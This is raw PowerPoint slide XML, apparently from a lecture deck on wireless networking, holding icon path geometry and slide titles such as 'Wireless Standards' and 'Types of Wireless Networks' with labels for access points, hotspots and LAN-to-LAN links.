              <a:gd name="T11" fmla="*/ 228099 h 152"/>
              <a:gd name="T12" fmla="*/ 253546 w 168"/>
              <a:gd name="T13" fmla="*/ 247650 h 152"/>
              <a:gd name="T14" fmla="*/ 175532 w 168"/>
              <a:gd name="T15" fmla="*/ 247650 h 152"/>
              <a:gd name="T16" fmla="*/ 156029 w 168"/>
              <a:gd name="T17" fmla="*/ 228099 h 152"/>
              <a:gd name="T18" fmla="*/ 156029 w 168"/>
              <a:gd name="T19" fmla="*/ 71688 h 152"/>
              <a:gd name="T20" fmla="*/ 175532 w 168"/>
              <a:gd name="T21" fmla="*/ 52137 h 152"/>
              <a:gd name="T22" fmla="*/ 195036 w 168"/>
              <a:gd name="T23" fmla="*/ 71688 h 152"/>
              <a:gd name="T24" fmla="*/ 195036 w 168"/>
              <a:gd name="T25" fmla="*/ 228099 h 152"/>
              <a:gd name="T26" fmla="*/ 175532 w 168"/>
              <a:gd name="T27" fmla="*/ 247650 h 152"/>
              <a:gd name="T28" fmla="*/ 97518 w 168"/>
              <a:gd name="T29" fmla="*/ 247650 h 152"/>
              <a:gd name="T30" fmla="*/ 78014 w 168"/>
              <a:gd name="T31" fmla="*/ 228099 h 152"/>
              <a:gd name="T32" fmla="*/ 78014 w 168"/>
              <a:gd name="T33" fmla="*/ 123825 h 152"/>
              <a:gd name="T34" fmla="*/ 97518 w 168"/>
              <a:gd name="T35" fmla="*/ 104274 h 152"/>
              <a:gd name="T36" fmla="*/ 117021 w 168"/>
              <a:gd name="T37" fmla="*/ 123825 h 152"/>
              <a:gd name="T38" fmla="*/ 117021 w 168"/>
              <a:gd name="T39" fmla="*/ 228099 h 152"/>
              <a:gd name="T40" fmla="*/ 97518 w 168"/>
              <a:gd name="T41" fmla="*/ 247650 h 152"/>
              <a:gd name="T42" fmla="*/ 19504 w 168"/>
              <a:gd name="T43" fmla="*/ 247650 h 152"/>
              <a:gd name="T44" fmla="*/ 0 w 168"/>
              <a:gd name="T45" fmla="*/ 228099 h 152"/>
              <a:gd name="T46" fmla="*/ 0 w 168"/>
              <a:gd name="T47" fmla="*/ 175962 h 152"/>
              <a:gd name="T48" fmla="*/ 19504 w 168"/>
              <a:gd name="T49" fmla="*/ 156411 h 152"/>
              <a:gd name="T50" fmla="*/ 39007 w 168"/>
              <a:gd name="T51" fmla="*/ 175962 h 152"/>
              <a:gd name="T52" fmla="*/ 39007 w 168"/>
              <a:gd name="T53" fmla="*/ 228099 h 152"/>
              <a:gd name="T54" fmla="*/ 19504 w 168"/>
              <a:gd name="T55" fmla="*/ 247650 h 15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168" h="152">
                <a:moveTo>
                  <a:pt x="156" y="152"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="149" y="152"/>
                  <a:pt x="144" y="147"/>
                  <a:pt x="144" y="140"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="144" y="12"/>
                  <a:pt x="144" y="12"/>
                  <a:pt x="144" y="12"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="144" y="5"/>
                  <a:pt x="149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40"/>
                  <a:pt x="168" y="140"/>
                  <a:pt x="168" y="140"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="168" y="147"/>
                  <a:pt x="163" y="152"/>
                  <a:pt x="156" y="152"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="108" y="152"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="101" y="152"/>
                  <a:pt x="96" y="147"/>
                  <a:pt x="96" y="140"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="96" y="44"/>
                  <a:pt x="96" y="44"/>
                  <a:pt x="96" y="44"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="96" y="37"/>
                  <a:pt x="101" y="32"/>
                  <a:pt x="108" y="32"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="115" y="32"/>
                  <a:pt x="120" y="37"/>
                  <a:pt x="120" y="44"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="120" y="140"/>
                  <a:pt x="120" y="140"/>
                  <a:pt x="120" y="140"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="120" y="147"/>
                  <a:pt x="115" y="152"/>
                  <a:pt x="108" y="152"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="60" y="152"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="53" y="152"/>
                  <a:pt x="48" y="147"/>
                  <a:pt x="48" y="140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67" y="64"/>
                  <a:pt x="72" y="69"/>
                  <a:pt x="72" y="76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72" y="147"/>
                  <a:pt x="67" y="152"/>
                  <a:pt x="60" y="152"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="12" y="152"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="5" y="152"/>
                  <a:pt x="0" y="147"/>
                  <a:pt x="0" y="140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7"/>
                  <a:pt x="19" y="152"/>
                  <a:pt x="12" y="152"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:sysClr val="window" lastClr="FFFFFF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294278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TextBox 83"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3828683" y="152400"/>
            <a:ext cx="4534639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rPr>
              <a:t>Wireless Standards</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="1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110" name="Freeform 69">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA559715-1923-43C9-B40A-C2309DA2909E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8029450" y="2603366"/>
            <a:ext cx="303353" cy="353750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="180" y="76"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="167" y="34"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="133" y="7"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="104" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="62" y="14"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="35" y="47"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="27" y="132"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="17" y="136"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="156"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="276"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="8" y="295"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="27" y="303"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="185" y="303"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="205" y="286"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="207" y="161"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="205" y="150"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="185" y="134"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="47" y="76"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="51" y="54"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="71" y="29"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="104" y="20"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="125" y="24"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="151" y="45"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="160" y="76"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="47" y="76"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="187" y="279"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="180" y="285"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="24" y="283"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="18" y="276"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="18" y="158"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="27" y="152"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="183" y="152"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="189" y="161"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="113" y="190"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="111" y="183"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="104" y="179"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="95" y="187"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="95" y="212"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="85" y="223"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="85" y="236"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="104" y="246"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="116" y="241"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="122" y="228"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="116" y="214"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="207" h="303">
                <a:moveTo>
                  <a:pt x="180" y="132"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="180" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="178" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="172" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="156" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="145" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="133" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="62" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185" y="303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="191" y="301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="200" y="295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="205" y="286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="207" y="281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="207" y="276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="207" y="161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="207" y="161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="207" y="156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="205" y="150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="200" y="141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="191" y="136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185" y="134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="132"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="47" y="76"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="47" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="93" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="125" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="151" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="156" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="160" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="160" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="160" y="132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47" y="132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47" y="76"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="189" y="276"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="189" y="276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="187" y="279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185" y="281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="183" y="283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="183" y="152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185" y="154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="187" y="158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="189" y="161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="189" y="276"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="113" y="212"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="113" y="190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113" y="190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113" y="187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111" y="183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96" y="183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95" y="187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95" y="190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95" y="212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95" y="212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91" y="214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="87" y="217"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91" y="241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96" y="245"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111" y="245"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116" y="241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122" y="236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122" y="228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122" y="228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122" y="223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120" y="217"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116" y="214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113" y="212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113" y="21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240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45EC8170-E338-ED6E-A702-DA053492C99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868118"/>
            <a:ext cx="12192000" cy="59279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3035289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881307" y="167640"/>
            <a:ext cx="6429389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Types of Wireless Networks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9626318" y="851262"/>
            <a:ext cx="2091791" cy="33855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>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Multiple Access Points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10134600" y="3782775"/>
            <a:ext cx="1475084" cy="33855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 algn="r">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3G/4G Hotspot</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="TextBox 83"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="473892" y="899076"/>
            <a:ext cx="2755861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 algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Extension to a Wired Network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87" name="TextBox 86"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="411480" y="3782189"/>
            <a:ext cx="2738827" cy="33855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>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LAN-to-LAN Wireless Network</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="90" name="Straight Arrow Connector 89"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3115716" y="3949121"/>
            <a:ext cx="1806804" cy="2345"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln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Straight Arrow Connector 92"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3229753" y="1068353"/>
            <a:ext cx="2516828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Straight Arrow Connector 198">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAC994D2-F8A9-4668-AA88-C1292451D4A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6759298" y="1072881"/>
            <a:ext cx="2706595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Straight Arrow Connector 237">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C95C078E-2575-4D03-8212-7165A15E75B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7428471" y="3945787"/>
            <a:ext cx="2723078" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln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/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5017292" y="2913036"/>
            <a:ext cx="2326858" cy="2114299"/>
            <a:chOff x="4116862" y="2014891"/>
            <a:chExt cx="3958275" cy="3955733"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Freeform 5"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4489301" y="2382881"/>
              <a:ext cx="3212762" cy="3213398"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2132 w 2137"/>
                <a:gd name="T1" fmla="*/ 1012 h 2138"/>
                <a:gd name="T2" fmla="*/ 2111 w 2137"/>
                <a:gd name="T3" fmla="*/ 869 h 2138"/>
                <a:gd name="T4" fmla="*/ 2100 w 2137"/>
                <a:gd name="T5" fmla="*/ 789 h 2138"/>
                <a:gd name="T6" fmla="*/ 2067 w 2137"/>
                <a:gd name="T7" fmla="*/ 699 h 2138"/>
                <a:gd name="T8" fmla="*/ 2025 w 2137"/>
                <a:gd name="T9" fmla="*/ 600 h 2138"/>
                <a:gd name="T10" fmla="*/ 1981 w 2137"/>
                <a:gd name="T11" fmla="*/ 519 h 2138"/>
                <a:gd name="T12" fmla="*/ 1895 w 2137"/>
                <a:gd name="T13" fmla="*/ 404 h 2138"/>
                <a:gd name="T14" fmla="*/ 1843 w 2137"/>
                <a:gd name="T15" fmla="*/ 338 h 2138"/>
                <a:gd name="T16" fmla="*/ 1777 w 2137"/>
                <a:gd name="T17" fmla="*/ 274 h 2138"/>
                <a:gd name="T18" fmla="*/ 1693 w 2137"/>
                <a:gd name="T19" fmla="*/ 212 h 2138"/>
                <a:gd name="T20" fmla="*/ 1614 w 2137"/>
                <a:gd name="T21" fmla="*/ 150 h 2138"/>
                <a:gd name="T22" fmla="*/ 1504 w 2137"/>
                <a:gd name="T23" fmla="*/ 101 h 2138"/>
                <a:gd name="T24" fmla="*/ 1411 w 2137"/>
                <a:gd name="T25" fmla="*/ 65 h 2138"/>
                <a:gd name="T26" fmla="*/ 1297 w 2137"/>
                <a:gd name="T27" fmla="*/ 25 h 2138"/>
                <a:gd name="T28" fmla="*/ 1197 w 2137"/>
                <a:gd name="T29" fmla="*/ 16 h 2138"/>
                <a:gd name="T30" fmla="*/ 1093 w 2137"/>
                <a:gd name="T31" fmla="*/ 5 h 2138"/>
                <a:gd name="T32" fmla="*/ 978 w 2137"/>
                <a:gd name="T33" fmla="*/ 12 h 2138"/>
                <a:gd name="T34" fmla="*/ 894 w 2137"/>
                <a:gd name="T35" fmla="*/ 19 h 2138"/>
                <a:gd name="T36" fmla="*/ 801 w 2137"/>
                <a:gd name="T37" fmla="*/ 43 h 2138"/>
                <a:gd name="T38" fmla="*/ 706 w 2137"/>
                <a:gd name="T39" fmla="*/ 72 h 2138"/>
                <a:gd name="T40" fmla="*/ 593 w 2137"/>
                <a:gd name="T41" fmla="*/ 112 h 2138"/>
                <a:gd name="T42" fmla="*/ 511 w 2137"/>
                <a:gd name="T43" fmla="*/ 162 h 2138"/>
                <a:gd name="T44" fmla="*/ 396 w 2137"/>
                <a:gd name="T45" fmla="*/ 249 h 2138"/>
                <a:gd name="T46" fmla="*/ 331 w 2137"/>
                <a:gd name="T47" fmla="*/ 296 h 2138"/>
                <a:gd name="T48" fmla="*/ 267 w 2137"/>
                <a:gd name="T49" fmla="*/ 368 h 2138"/>
                <a:gd name="T50" fmla="*/ 206 w 2137"/>
                <a:gd name="T51" fmla="*/ 452 h 2138"/>
                <a:gd name="T52" fmla="*/ 134 w 2137"/>
                <a:gd name="T53" fmla="*/ 550 h 2138"/>
                <a:gd name="T54" fmla="*/ 95 w 2137"/>
                <a:gd name="T55" fmla="*/ 638 h 2138"/>
                <a:gd name="T56" fmla="*/ 49 w 2137"/>
                <a:gd name="T57" fmla="*/ 775 h 2138"/>
                <a:gd name="T58" fmla="*/ 27 w 2137"/>
                <a:gd name="T59" fmla="*/ 831 h 2138"/>
                <a:gd name="T60" fmla="*/ 14 w 2137"/>
                <a:gd name="T61" fmla="*/ 951 h 2138"/>
                <a:gd name="T62" fmla="*/ 8 w 2137"/>
                <a:gd name="T63" fmla="*/ 1050 h 2138"/>
                <a:gd name="T64" fmla="*/ 7 w 2137"/>
                <a:gd name="T65" fmla="*/ 1146 h 2138"/>
                <a:gd name="T66" fmla="*/ 23 w 2137"/>
                <a:gd name="T67" fmla="*/ 1249 h 2138"/>
                <a:gd name="T68" fmla="*/ 37 w 2137"/>
                <a:gd name="T69" fmla="*/ 1348 h 2138"/>
                <a:gd name="T70" fmla="*/ 82 w 2137"/>
                <a:gd name="T71" fmla="*/ 1460 h 2138"/>
                <a:gd name="T72" fmla="*/ 123 w 2137"/>
                <a:gd name="T73" fmla="*/ 1550 h 2138"/>
                <a:gd name="T74" fmla="*/ 165 w 2137"/>
                <a:gd name="T75" fmla="*/ 1641 h 2138"/>
                <a:gd name="T76" fmla="*/ 254 w 2137"/>
